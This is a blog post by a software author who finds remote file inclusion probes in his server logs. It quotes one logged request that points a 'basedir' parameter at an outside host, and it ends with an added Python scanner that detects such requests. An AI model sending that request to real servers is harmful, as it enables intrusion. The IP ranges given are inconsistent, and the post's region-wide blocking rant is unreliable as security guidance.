So I started up logging on this site the other day, mostly out of curiosity. I was completely disheartened as soon as I did though. Come to find out some of the most common hits on the site are by people looking to exploit a basedir file inclusion vulnerability. What's worse, this is a vulnerability that exists in some of the software I've written and released open source. In any case, these assholes are basically trying to break into my server by exploiting this vulnerability.
What pisses me off most about this is that I'm the freakin' author of the software that was vulnerable - and I'm the one who wrote the patch. Who are these people? They're blindly trying the exploit against other software that doesn't even have the same code base. For instance:
Type: page not found
Date: Thursday, July 19, 2007 - 10:00
User: Anonymous
Location: http://justin.madirish.net/?q=taxonomy/addressbook.php?GLOBALS[basedir]=http://nxlf.cn/1??
Referrer:
Message: taxonomy/addressbook.php?GLOBALS[basedir]=http://nxlf.cn/1??
Severity: warning
Hostname: 126.96.36.199
Who is 188.8.131.52? Well, let's do some checking and find out. ARIN reports that this is someone in APNIC. I fucking hate people on APNIC. They're responsible for like 90% of the spam I get and now they're trying to hack my servers. Well guess what assholes? I'm dropping the entire APNIC range (184.108.40.206 - 220.127.116.11) into a blacklist so my server doesn't respond to your requests.
This might be a little overkill in terms of response, but frankly the information on my site is totally free. I don't get anything out of sharing it, and this sort of crap makes me want to yank the whole thing. Anywhoo, for now I'm dropping a couple extra lines into httpd.conf:
Deny from 163.23
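
An added example, not part of the original post: a small log scanner that flags requests like the one logged above, where a query parameter's value is a remote URL, including when the probe is nested inside another parameter (as in the ?q=... entry) or percent-encoded. The function names, the (hostname, location) entry format, the client addresses and the remote.example host are assumptions constructed for this illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# A parameter whose value *starts* with a remote URL, e.g. GLOBALS[basedir]=http://...
REMOTE_VALUE = re.compile(
    r"([A-Za-z_][\w\[\].]*)=((?:https?|ftps?)://[^\s&?]+)", re.IGNORECASE
)

def find_remote_includes(url, own_hosts=()):
    """Return (parameter, remote_host) pairs found in the query part of url."""
    decoded = url
    for _ in range(2):  # undo single and double percent-encoding
        decoded = unquote(decoded)
    # Search everything after the first '?' as raw text. A normal query parser
    # would hide the probe above inside the value of q, because the request
    # contains a second '?'.
    query = decoded.partition("?")[2]
    hits = []
    for match in REMOTE_VALUE.finditer(query):
        host = (urlsplit(match.group(2)).hostname or "").lower()
        if host and host not in own_hosts:  # ignore redirects back to this site
            hits.append((match.group(1), host))
    return hits

def scan(entries, own_hosts=()):
    """Group hits by client address. entries: iterable of (hostname, location)."""
    by_client = defaultdict(list)
    for client, location in entries:
        for hit in find_remote_includes(location, own_hosts):
            by_client[client].append(hit)
    return dict(by_client)

# Constructed sample entries; the first Location is the one quoted in the post,
# the client addresses come from documentation ranges.
SAMPLE = [
    ("192.0.2.10", "http://justin.madirish.net/?q=taxonomy/addressbook.php?GLOBALS[basedir]=http://nxlf.cn/1??"),
    ("192.0.2.10", "http://justin.madirish.net/?q=node/3&GLOBALS%5Bbasedir%5D=http%3A%2F%2Fremote.example%2Fx.txt%3F"),
    ("198.51.100.7", "http://justin.madirish.net/?q=user/login&destination=http://justin.madirish.net/node/3"),
    ("198.51.100.7", "http://justin.madirish.net/?q=search/node/http"),
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE, own_hosts={"justin.madirish.net"}).items():
        print(client, hits)
```

Passing the site's own hostname in own_hosts keeps legitimate same-site redirect parameters from being counted as probes.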